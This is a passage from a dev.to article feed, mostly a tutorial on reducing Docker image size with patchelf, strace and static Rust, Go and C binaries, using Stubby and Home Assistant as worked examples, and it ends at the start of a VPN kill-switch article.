        /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/ld-linux-x86-64.so.2 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca90c9000&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Motivating example: Stubby
&lt;/h2&gt;

&lt;p&gt;Let's use &lt;code&gt;patchelf&lt;/code&gt; to reduce the Docker image size for &lt;a href="https://dnsprivacy.org/dns_privacy_daemon_-_stubby/"&gt;Stubby&lt;/a&gt; — a name resolver that supports DNS-over-TLS. We will use Debian as the base image but the process is specific neither to this Linux distribution nor to this application.&lt;/p&gt;

&lt;p&gt;First we write a Dockerfile that installs Stubby and the required packages from Debian repositories on the first stage, and on the second stage copies only the necessary files into the final image created from scratch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM debian:latest AS builder

&lt;span class="c"&gt;# install stubby and patchelf&lt;/span&gt;
RUN apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; stubby ca-certificates patchelf

&lt;span class="c"&gt;# copy and run patchelf script&lt;/span&gt;
COPY patchelf.sh /tmp/patchelf.sh
RUN /tmp/patchelf.sh

&lt;span class="c"&gt;# create the final image from scratch (i.e. without the base image)&lt;/span&gt;
FROM scratch

&lt;span class="c"&gt;# copy only the /out directory that contains the files that are actually used by stubby&lt;/span&gt;
COPY &lt;span class="nt"&gt;--from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;builder /out /

EXPOSE 53/udp
EXPOSE 53/tcp

CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/stubby"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Second we write &lt;code&gt;patchelf&lt;/code&gt; script that determines which files need to be copied. The script copies all the dependencies, the program interpreter, the binary itself and the configuration file, and finally the OpenSSL library's configuration files and the list of trusted SSL certificates.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/lib /out/bin /out/etc /out/var/cache/stubby /out/var/run /out/usr/lib
&lt;span class="c"&gt;# copy the libraries that stubby uses&lt;/span&gt;
ldd /usr/bin/stubby |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*=&amp;gt; (.*) \(.*\)$/\1/p'&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        &lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/lib
    &lt;span class="k"&gt;done&lt;/span&gt;
&lt;span class="c"&gt;# copy the interpreter&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; /lib64/ld-linux-x86-64.so.2 /out/lib
&lt;span class="c"&gt;# copy stubby and its configuration file&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/bin/stubby /out/bin/stubby
&lt;span class="c"&gt;# make stubby listen on all addresses to access it from outside the container&lt;/span&gt;
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'s/127\.0\.0\.1/0.0.0.0/g'&lt;/span&gt; /etc/stubby/stubby.yml
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /etc/stubby /out/etc/stubby
&lt;span class="c"&gt;# copy openssl library configuration and certificates&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /etc/ssl /out/etc/ssl
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /usr/lib/ssl /out/usr/lib/ssl
find /out/etc/ssl/certs &lt;span class="nt"&gt;-not&lt;/span&gt; &lt;span class="nt"&gt;-type&lt;/span&gt; d &lt;span class="nt"&gt;-not&lt;/span&gt; &lt;span class="nt"&gt;-name&lt;/span&gt; ca-certificates.crt &lt;span class="nt"&gt;-delete&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /out/usr/lib/ssl/misc
&lt;span class="c"&gt;# patch stubby binary to use the copied interpreter and libraries&lt;/span&gt;
patchelf &lt;span class="nt"&gt;--set-interpreter&lt;/span&gt; /lib/ld-linux-x86-64.so.2 &lt;span class="nt"&gt;--set-rpath&lt;/span&gt; /lib /out/bin/stubby
ldd /out/bin/stubby
find /out
&lt;span class="c"&gt;# check that stubby works&lt;/span&gt;
&lt;span class="nb"&gt;chroot&lt;/span&gt; /out /bin/stubby &lt;span class="nt"&gt;-V&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build the image and check that it runs correctly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker build &lt;span class="nt"&gt;--tag&lt;/span&gt; stubby:debian-patchelf &lt;span class="nb"&gt;.&lt;/span&gt;
🌊 docker inspect docker inspect &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"{{ .Size }}"&lt;/span&gt; stubby:debian-patchelf
13120030
🌊 docker run &lt;span class="nt"&gt;--init&lt;/span&gt; &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--publish&lt;/span&gt; 53:53/udp stubby:debian-patchelf stubby &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;span class="c"&gt;# in the other terminal window&lt;/span&gt;
🌊 dig @127.0.0.1 +short google.com
142.251.220.206
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Results
&lt;/h2&gt;

&lt;p&gt;We compare the resulting image size using &lt;code&gt;docker inspect&lt;/code&gt; command. The competing images are Debian-based and Alpine-based images created without &lt;code&gt;patchelf&lt;/code&gt; script.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Image&lt;/th&gt;
&lt;th&gt;Size, MiB&lt;/th&gt;
&lt;th&gt;Size, %&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;stubby:debian-patchelf&lt;/td&gt;
&lt;td&gt;12.5&lt;/td&gt;
&lt;td&gt;9% of stubby:debian&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:debian&lt;/td&gt;
&lt;td&gt;143.4&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:alpine-patchelf&lt;/td&gt;
&lt;td&gt;9.0&lt;/td&gt;
&lt;td&gt;64% of stubby:alpine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:alpine&lt;/td&gt;
&lt;td&gt;14.1&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The results speak for themselves. We reduced the size of Debian-based Stubby image &lt;strong&gt;by 91%&lt;/strong&gt; and Alpine-based Stubby image &lt;strong&gt;by 36%&lt;/strong&gt; by including only the files that Stubby actually uses. Impressive.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Limitations
&lt;/h2&gt;

&lt;p&gt;Patchelf fully automates copying dependencies and program interpreter, however, any other files need to be copied manually. Also, if your program is not compiled to ELF binary (e.g. NodeJS, Python) then you're out of luck. This is where strace can help.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Strace
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovzzxaqwf9v79jvlkfge.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovzzxaqwf9v79jvlkfge.jpg" alt="Photo by Lance Grandahl on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This tool intercepts system calls the binary makes and prints their arguments. Strace uses the same kernel API as debuggers and may considerably slow down the traced program. Luckily we will use this tool only on the Docker image build stage.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Motivating example: Home Assistant
&lt;/h2&gt;

&lt;p&gt;This is the image that I failed to install on Raspberry Pi Zero while using the official Docker image. When you pull this image Docker downloads the many layers in parallel and then fails to extract them due to a lack of disk space. I had to temporarily attach an external USB drive and move &lt;code&gt;/var/lib/docker&lt;/code&gt; directory there, then pull the image and move the directory back to the Raspberry Pi to successfully pull and run this image.&lt;/p&gt;

&lt;p&gt;Now we create a new Docker image for Home Assistant that has only one layer and consumes only a fraction of disk space of the original image.&lt;/p&gt;

&lt;p&gt;First we create Dockerfile with the official image as the base.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM ghcr.io/home-assistant/home-assistant:stable AS builder

RUN apk update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apk add strace

COPY strace.sh /tmp/strace.sh
RUN /tmp/strace.sh

FROM scratch

COPY &lt;span class="nt"&gt;--from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;builder /out /

&lt;span class="c"&gt;# default Home Assistant port&lt;/span&gt;
EXPOSE 8123/tcp

&lt;span class="c"&gt;# default Home Assistant command&lt;/span&gt;
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/usr/local/bin/python3"&lt;/span&gt;, &lt;span class="s2"&gt;"-m"&lt;/span&gt;, &lt;span class="s2"&gt;"homeassistant"&lt;/span&gt;, &lt;span class="s2"&gt;"--config"&lt;/span&gt;, &lt;span class="s2"&gt;"/config"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we write &lt;code&gt;strace&lt;/code&gt; script that finds all the files accessed by Home Assistant and copies them into the final image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/lib /out/usr/local/bin /out/usr/bin /out/usr/local/lib
&lt;span class="c"&gt;# copy ffmpeg and its dependencies&lt;/span&gt;
ldd /usr/bin/ffmpeg |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*=&amp;gt; (.*) \(.*\)$/\1/p'&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        &lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/lib
    &lt;span class="k"&gt;done
&lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; /lib/ld-musl-x86_64.so.1 /out/lib
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/local/bin/python3 /out/usr/local/bin/python3
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/bin/ffmpeg /out/usr/bin/ffmpeg
&lt;span class="c"&gt;# copy frontend files manually&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/usr/local/lib/python3.11/site-packages
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /usr/local/lib/python3.11/site-packages/hass_frontend /out/usr/local/lib/python3.11/site-packages/hass_frontend
&lt;span class="c"&gt;# copy all the files that home assistant actually opens&lt;/span&gt;
strace &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; open,stat,lstat &lt;span class="nb"&gt;timeout &lt;/span&gt;30s python3 &lt;span class="nt"&gt;-m&lt;/span&gt; homeassistant &lt;span class="nt"&gt;--config&lt;/span&gt; /config 2&amp;gt;&amp;amp;1 |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*(open|stat)\(.*"([^"]+)".*/\2/p'&lt;/span&gt; |
    &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-vE&lt;/span&gt; &lt;span class="s1"&gt;'^/(dev|proc|sys|tmp)'&lt;/span&gt; |
    &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
            continue
        fi
        if &lt;/span&gt;&lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then&lt;/span&gt;
            &lt;span class="c"&gt;# create directories&lt;/span&gt;
            &lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="c"&gt;# copy files&lt;/span&gt;
            &lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;dirname&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
            &lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
        &lt;/span&gt;&lt;span class="k"&gt;fi
    done&lt;/span&gt;
&lt;span class="c"&gt;# recreate config directory&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /out/config
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /out/config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build the image and check that it runs correctly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker build &lt;span class="nt"&gt;--tag&lt;/span&gt; home-assistant:strace &lt;span class="nb"&gt;.&lt;/span&gt;
🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--publish&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8123:8123/tcp home-assistant:strace &lt;span class="se"&gt;\&lt;/span&gt;
    python3 &lt;span class="nt"&gt;-m&lt;/span&gt; homeassistant &lt;span class="nt"&gt;--config&lt;/span&gt; /config
&lt;span class="c"&gt;# now open https://127.0.0.1:8123/ in the browser&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Results
&lt;/h2&gt;

&lt;p&gt;We compare the resulting image size using &lt;code&gt;docker inspect&lt;/code&gt; command to the original image.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Image&lt;/th&gt;
&lt;th&gt;Size, MiB&lt;/th&gt;
&lt;th&gt;Size, %&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;home-assistant:strace&lt;/td&gt;
&lt;td&gt;590&lt;/td&gt;
&lt;td&gt;31&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ghcr.io/home-assistant/home-assistant:stable&lt;/td&gt;
&lt;td&gt;1886&lt;/td&gt;
&lt;td&gt;100&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;We were able to reduce the image size &lt;strong&gt;by 69%&lt;/strong&gt;. Most importantly now Raspberry Pi Zero can pull and run the new image without hitting the disk space limit.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Limitations
&lt;/h2&gt;

&lt;p&gt;The obvious limitation of &lt;code&gt;strace&lt;/code&gt; is that frontend files are not copied automatically because they are read only if an HTTP request is made. Of course we can do some HTTP requests with curl but usually all frontend files are needed. It is much easier to just copy them all to the final image.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Your own images
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs0syia4loo8kwd52eozf.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs0syia4loo8kwd52eozf.jpg" alt="Photo by Levi Guzman on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Dealing with your own Docker images is much easier than with third-party ones. You either compile your program into a static binary or compile to a dynamically linked binary and use &lt;code&gt;patchelf&lt;/code&gt; tool to copy the dependencies and the interpreter. In this section we show how to compile static binaries for Rust, Go and C/C++. The general approach is to use &lt;a href="https://www.musl-libc.org/"&gt;musl&lt;/a&gt; library and the accompanying &lt;code&gt;musl-gcc&lt;/code&gt; tool to build your project, but some languages make it simpler.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Rust static binaries
&lt;/h2&gt;

&lt;p&gt;In order to use musl library in your project you need to install musl-based toolchain and then compile for the corresponding target.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 rustup toolchain add stable &lt;span class="nt"&gt;--target&lt;/span&gt; x86_64-unknown-linux-musl 
&lt;span class="c"&gt;# here we remove debugging information and optimize for size&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;RUSTFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-Copt-level=z -Cstrip=symbols'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--target&lt;/span&gt; x86_64-unknown-linux-musl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build Docker image that includes only the resulting binary file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM scratch
COPY target/x86_64-unknown-linux-musl/release/app /bin/app
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/app"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see the resulting image contains only the binary but not the dependencies. This means that Docker is merely a distribution format for static binaries.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Go static binaries
&lt;/h2&gt;

&lt;p&gt;Go does not use musl, but contains its own static implementation of libc. This makes compiling static binaries even simpler.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CGO_ENABLED&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0 go build &lt;span class="nt"&gt;-ldflags&lt;/span&gt; &lt;span class="s1"&gt;'-s -w'&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; app ./cmd/app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build Docker image similar to Rust static binary.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM scratch
COPY app /bin/app
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/app"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;C/C++ static binaries
&lt;/h1&gt;

&lt;p&gt;The idea here is to replace C/C++ compiler with &lt;code&gt;musl-gcc&lt;/code&gt; and enable static compilation in GCC via &lt;code&gt;-static&lt;/code&gt; linker flag. All the dependencies have to be recompiled this way as well. This makes the approach especially problematic for dependencies that prefer dynamic linking for whatever reason (e.g. use features of GNU libc that does not support static linking; dynamically load other libraries; use sophisticated build instructions that make it impossible for a mere human to modify to enable static linking). That's why the general approach for C/C++ binaries is to use &lt;code&gt;patchelf&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The following snippet shows how to compile static binary for a cmake-based project.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CMakeLists.txt &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
project (HelloWorld)
add_executable (app app.c)
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; app.c &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
#include &amp;lt;stdio.h&amp;gt;
int main() {
    printf("Hello world&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;");
    return 0;
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;🌊 &lt;span class="nb"&gt;mkdir &lt;/span&gt;build-musl
🌊 &lt;span class="nb"&gt;cd &lt;/span&gt;build-musl
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CC&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;musl-gcc &lt;span class="nv"&gt;LDFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-static'&lt;/span&gt; cmake &lt;span class="nt"&gt;-DCMAKE_BUILD_TYPE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Release ..
🌊 make
&lt;span class="o"&gt;[&lt;/span&gt; 50%] Building C object CMakeFiles/app.dir/app.c.o
&lt;span class="o"&gt;[&lt;/span&gt;100%] Linking C executable app
&lt;span class="o"&gt;[&lt;/span&gt;100%] Built target app
🌊 ldd ./app
        not a dynamic executable
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftxisbn4lxjxtftg0r1t3.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftxisbn4lxjxtftg0r1t3.jpg" alt="Photo by Walter Walraven on Unsplash." width="640" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are multiple approaches that help reduce Docker image size:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;including only the required dependencies with &lt;code&gt;patchelf&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;including only the required files with &lt;code&gt;strace&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;compiling your own program into a static binary that includes all the dependencies.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On average you can reduce the image size by approximately 50% (at least in our experiments). The smaller size improves Docker performance on resource constrained devices such as Raspberry Pi Zero. However, the major benefit for any platform is the fact that the attack surface is much smaller when your image doesn't contain tools like &lt;code&gt;wget&lt;/code&gt;, &lt;code&gt;curl&lt;/code&gt; and shell interpreters.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit this &lt;a href="https://staex.io/"&gt;page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>devops</category>
      <category>security</category>
      <category>docker</category>
    </item>
    <item>
      <title>VPN kill switch: how to do it on Linux</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/vpn-kill-switch-how-to-do-it-on-linux-3ne3</link>
      <guid>https://dev.to/staex/vpn-kill-switch-how-to-do-it-on-linux-3ne3</guid>
      <description>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Kill_switch"&gt;Kill switch&lt;/a&gt; is a mechanism that prohibits any outgoing traffic unless a VPN is active. In this article we discuss how to implement such a mechanism using Linux &lt;a href="https://en.wikipedia.org/wiki/Policy-based_routing"&gt;policy-based routing&lt;/a&gt; for a wide range of VPNs.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;
Linux IP packet routing tour.

&lt;ul&gt;
&lt;li&gt;
